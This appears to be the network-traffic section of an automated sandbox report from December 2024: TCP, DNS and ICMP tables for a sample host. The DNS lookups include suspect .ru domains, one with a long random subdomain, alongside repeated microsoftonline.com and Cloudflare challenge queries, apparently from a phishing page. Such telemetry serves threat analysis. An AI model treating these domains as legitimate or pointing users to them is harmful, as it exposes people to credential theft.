                                                                                                    Dec 23, 2024 19:12:16.004725933 CET49816443192.168.2.5172.67.189.38
                                                                                                    Dec 23, 2024 19:12:16.004734039 CET44349816172.67.189.38192.168.2.5
                                                                                                    Dec 23, 2024 19:12:16.056875944 CET49816443192.168.2.5172.67.189.38
                                                                                                    Dec 23, 2024 19:12:16.880598068 CET44349816172.67.189.38192.168.2.5
                                                                                                    Dec 23, 2024 19:12:16.880755901 CET44349816172.67.189.38192.168.2.5
                                                                                                    Dec 23, 2024 19:12:16.880904913 CET49816443192.168.2.5172.67.189.38
                                                                                                    Dec 23, 2024 19:12:16.881772995 CET49816443192.168.2.5172.67.189.38
                                                                                                    Dec 23, 2024 19:12:16.881795883 CET44349816172.67.189.38192.168.2.5
                                                                                                    Dec 23, 2024 19:12:39.729895115 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:39.729932070 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:39.730041027 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:39.730220079 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:39.730232954 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:41.421120882 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:41.421416044 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:41.421438932 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:41.421901941 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:41.422251940 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:41.422341108 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:41.463089943 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:51.119760036 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:51.119831085 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:12:51.119920969 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:51.871422052 CET49874443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:12:51.871448994 CET44349874142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:39.792639017 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:39.792675018 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:39.792895079 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:39.793020964 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:39.793032885 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:41.495289087 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:41.495762110 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:41.495790958 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:41.496200085 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:41.496612072 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:41.496851921 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:41.541040897 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:51.206165075 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:51.206243038 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:13:51.206387043 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:51.873406887 CET50013443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:13:51.873440981 CET44350013142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:14:39.855531931 CET50033443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:14:39.855597019 CET44350033142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:14:39.855761051 CET50033443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:14:39.856012106 CET50033443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:14:39.856029034 CET44350033142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:14:41.551147938 CET44350033142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:14:41.551601887 CET50033443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:14:41.551650047 CET44350033142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:14:41.552129984 CET44350033142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:14:41.552444935 CET50033443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:14:41.552541971 CET44350033142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:14:41.603658915 CET50033443192.168.2.5142.250.181.68
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 23, 2024 19:11:35.485775948 CET53548341.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:35.495465994 CET53650991.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:35.629627943 CET5948853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:35.629760981 CET5628553192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:35.993125916 CET53562851.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:35.993166924 CET53594881.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.263772011 CET53550791.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.667220116 CET5407553192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.667367935 CET6158153192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.675292969 CET5367853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.675436974 CET5267553192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.675944090 CET6081753192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.676076889 CET6392653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.676439047 CET5191653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.676569939 CET5001453192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:39.804336071 CET53615811.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.804898024 CET53540751.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.813342094 CET53536781.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.813497066 CET53526751.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.813532114 CET53500141.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.813680887 CET53639261.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.814888000 CET53608171.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.816909075 CET53519161.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:40.144484997 CET53609381.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.821131945 CET5710953192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:41.821432114 CET6012153192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:41.958376884 CET53571091.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.960186958 CET53601211.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.984817982 CET6118653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:41.985182047 CET5460253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:42.122220039 CET53611861.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:42.122762918 CET53546021.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:43.510188103 CET5005253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:43.510555029 CET6431953192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:43.558068991 CET6396653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:43.558238983 CET6036953192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:43.647368908 CET53500521.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:43.647584915 CET53643191.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:43.694993019 CET53639661.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:43.695264101 CET53603691.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:48.847342014 CET5601653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:48.847711086 CET5059853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:11:48.985395908 CET53560161.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:48.985407114 CET53505981.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:11:55.294141054 CET53529481.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:09.619564056 CET5539753192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:09.619684935 CET5701453192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:10.007534027 CET53553971.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:10.007630110 CET53570141.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:13.394740105 CET5338353192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:13.394958973 CET5740853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:13.406680107 CET5395953192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:13.406914949 CET6517253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:13.544986963 CET53651721.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:13.546350956 CET53539591.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:13.668466091 CET53533831.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:13.703707933 CET53574081.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:13.709816933 CET6180653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:13.848450899 CET53618061.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:13.973817110 CET6091453192.168.2.58.8.8.8
                                                                                                    Dec 23, 2024 19:12:13.977277040 CET5052253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:14.108517885 CET53609148.8.8.8192.168.2.5
                                                                                                    Dec 23, 2024 19:12:14.114109993 CET53505221.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:14.166892052 CET53605811.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:14.988303900 CET5873553192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:14.988486052 CET6240853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:15.127146959 CET53587351.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:15.128140926 CET53624081.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:20.149939060 CET5220253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:20.150541067 CET5940853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:20.287801027 CET53594081.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:20.288400888 CET53522021.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:20.289186001 CET6077753192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:20.426796913 CET53607771.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:26.659492970 CET5250153192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:26.659737110 CET5856053192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:26.798640013 CET53525011.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:26.799338102 CET53585601.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:26.800438881 CET5508253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:26.940730095 CET53550821.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:27.127892017 CET6465953192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:27.128223896 CET5995653192.168.2.58.8.8.8
                                                                                                    Dec 23, 2024 19:12:27.262264013 CET53599568.8.8.8192.168.2.5
                                                                                                    Dec 23, 2024 19:12:27.265786886 CET53646591.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:35.370148897 CET53549081.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:36.806138039 CET53567841.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:50.104784966 CET4948853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:50.249475002 CET53494881.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:57.140311956 CET5043253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:57.140469074 CET5006653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:57.278182983 CET53500661.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:57.282582045 CET53504321.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:12:57.283354998 CET6038853192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:12:57.422056913 CET53603881.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:13:05.546947002 CET5096753192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:13:05.547219992 CET5961353192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:13:05.684077024 CET53509671.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:13:05.684811115 CET53596131.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:13:05.685650110 CET6118753192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:13:05.823678017 CET53611871.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:13:05.837419987 CET5067353192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:13:05.838154078 CET6202553192.168.2.58.8.8.8
                                                                                                    Dec 23, 2024 19:13:05.971766949 CET53620258.8.8.8192.168.2.5
                                                                                                    Dec 23, 2024 19:13:05.974591017 CET53506731.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:13:07.382487059 CET53598021.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:13:22.338351011 CET5717753192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:13:22.552819014 CET53571771.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:13:53.374620914 CET53572781.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:14:05.846816063 CET6307153192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:14:05.847031116 CET5424253192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:14:05.985133886 CET53630711.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:14:06.029131889 CET5415653192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:14:06.074131966 CET53542421.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:14:06.166995049 CET53541561.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:14:07.116101980 CET6208753192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:14:07.116250038 CET6523053192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:14:07.252928972 CET53620871.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:14:07.254036903 CET53652301.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:14:07.265449047 CET6186053192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:14:07.266237020 CET5003453192.168.2.58.8.8.8
                                                                                                    Dec 23, 2024 19:14:07.400285006 CET53500348.8.8.8192.168.2.5
                                                                                                    Dec 23, 2024 19:14:07.402391911 CET53618601.1.1.1192.168.2.5
                                                                                                    Dec 23, 2024 19:14:32.042431116 CET5454353192.168.2.51.1.1.1
                                                                                                    Dec 23, 2024 19:14:32.273049116 CET53545431.1.1.1192.168.2.5
                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                    Dec 23, 2024 19:11:35.601794958 CET192.168.2.51.1.1.1c234(Port unreachable)Destination Unreachable
                                                                                                    Dec 23, 2024 19:14:06.074213028 CET192.168.2.51.1.1.1c242(Port unreachable)Destination Unreachable
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 23, 2024 19:11:35.629627943 CET192.168.2.51.1.1.10xeffStandard query (0)n6b.kolivane.ruA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:35.629760981 CET192.168.2.51.1.1.10x49eeStandard query (0)n6b.kolivane.ru65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.667220116 CET192.168.2.51.1.1.10x1a69Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.667367935 CET192.168.2.51.1.1.10xcef4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.675292969 CET192.168.2.51.1.1.10x393eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.675436974 CET192.168.2.51.1.1.10x37c3Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.675944090 CET192.168.2.51.1.1.10x24eeStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.676076889 CET192.168.2.51.1.1.10xfb57Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.676439047 CET192.168.2.51.1.1.10x1108Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.676569939 CET192.168.2.51.1.1.10xd846Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:41.821131945 CET192.168.2.51.1.1.10xaddbStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:41.821432114 CET192.168.2.51.1.1.10xa060Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:41.984817982 CET192.168.2.51.1.1.10xf2f9Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:41.985182047 CET192.168.2.51.1.1.10x5aefStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.510188103 CET192.168.2.51.1.1.10xbcedStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.510555029 CET192.168.2.51.1.1.10xb5a7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.558068991 CET192.168.2.51.1.1.10x436Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.558238983 CET192.168.2.51.1.1.10x8a9eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:48.847342014 CET192.168.2.51.1.1.10x9352Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:48.847711086 CET192.168.2.51.1.1.10x7c2dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:09.619564056 CET192.168.2.51.1.1.10x487eStandard query (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:09.619684935 CET192.168.2.51.1.1.10xf376Standard query (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.394740105 CET192.168.2.51.1.1.10x30b8Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.394958973 CET192.168.2.51.1.1.10xd88fStandard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.406680107 CET192.168.2.51.1.1.10x2b24Standard query (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.406914949 CET192.168.2.51.1.1.10xb65dStandard query (0)myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.709816933 CET192.168.2.51.1.1.10x3cf3Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.973817110 CET192.168.2.58.8.8.80x7981Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:13.977277040 CET192.168.2.51.1.1.10x1deeStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:14.988303900 CET192.168.2.51.1.1.10xb0a8Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:14.988486052 CET192.168.2.51.1.1.10x41dStandard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:20.149939060 CET192.168.2.51.1.1.10x2a4bStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:20.150541067 CET192.168.2.51.1.1.10x8cdfStandard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:20.289186001 CET192.168.2.51.1.1.10x1acfStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:26.659492970 CET192.168.2.51.1.1.10x373eStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:26.659737110 CET192.168.2.51.1.1.10xf6b0Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:26.800438881 CET192.168.2.51.1.1.10x5b8dStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:27.127892017 CET192.168.2.51.1.1.10xf55fStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:27.128223896 CET192.168.2.58.8.8.80xf200Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:50.104784966 CET192.168.2.51.1.1.10x60Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:57.140311956 CET192.168.2.51.1.1.10x3c90Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:57.140469074 CET192.168.2.51.1.1.10x39b2Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:12:57.283354998 CET192.168.2.51.1.1.10x67f0Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.546947002 CET192.168.2.51.1.1.10x8946Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.547219992 CET192.168.2.51.1.1.10x4914Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.685650110 CET192.168.2.51.1.1.10xf422Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.837419987 CET192.168.2.51.1.1.10x3f24Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:05.838154078 CET192.168.2.58.8.8.80x12cdStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:13:22.338351011 CET192.168.2.51.1.1.10xa9a5Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:05.846816063 CET192.168.2.51.1.1.10xbba4Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:05.847031116 CET192.168.2.51.1.1.10x1fd2Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:06.029131889 CET192.168.2.51.1.1.10x55cStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.116101980 CET192.168.2.51.1.1.10x5c68Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.116250038 CET192.168.2.51.1.1.10xabb3Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.265449047 CET192.168.2.51.1.1.10x138bStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:07.266237020 CET192.168.2.58.8.8.80x7761Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:14:32.042431116 CET192.168.2.51.1.1.10xdf26Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 23, 2024 19:11:35.993125916 CET1.1.1.1192.168.2.50x49eeNo error (0)n6b.kolivane.ru65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:35.993166924 CET1.1.1.1192.168.2.50xeffNo error (0)n6b.kolivane.ru172.67.143.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:35.993166924 CET1.1.1.1192.168.2.50xeffNo error (0)n6b.kolivane.ru104.21.47.3A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.804336071 CET1.1.1.1192.168.2.50xcef4No error (0)www.google.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.804898024 CET1.1.1.1192.168.2.50x1a69No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.813342094 CET1.1.1.1192.168.2.50x393eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.813342094 CET1.1.1.1192.168.2.50x393eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.813342094 CET1.1.1.1192.168.2.50x393eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.813342094 CET1.1.1.1192.168.2.50x393eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.813532114 CET1.1.1.1192.168.2.50xd846No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.813680887 CET1.1.1.1192.168.2.50xfb57No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.814888000 CET1.1.1.1192.168.2.50x24eeNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.814888000 CET1.1.1.1192.168.2.50x24eeNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.816909075 CET1.1.1.1192.168.2.50x1108No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:39.816909075 CET1.1.1.1192.168.2.50x1108No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:41.958376884 CET1.1.1.1192.168.2.50xaddbNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:41.958376884 CET1.1.1.1192.168.2.50xaddbNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:41.960186958 CET1.1.1.1192.168.2.50xa060No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:42.122220039 CET1.1.1.1192.168.2.50xf2f9No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:42.122220039 CET1.1.1.1192.168.2.50xf2f9No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:42.122220039 CET1.1.1.1192.168.2.50xf2f9No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:42.122220039 CET1.1.1.1192.168.2.50xf2f9No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                    Dec 23, 2024 19:11:43.647368908 CET1.1.1.1192.168.2.50xbcedNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
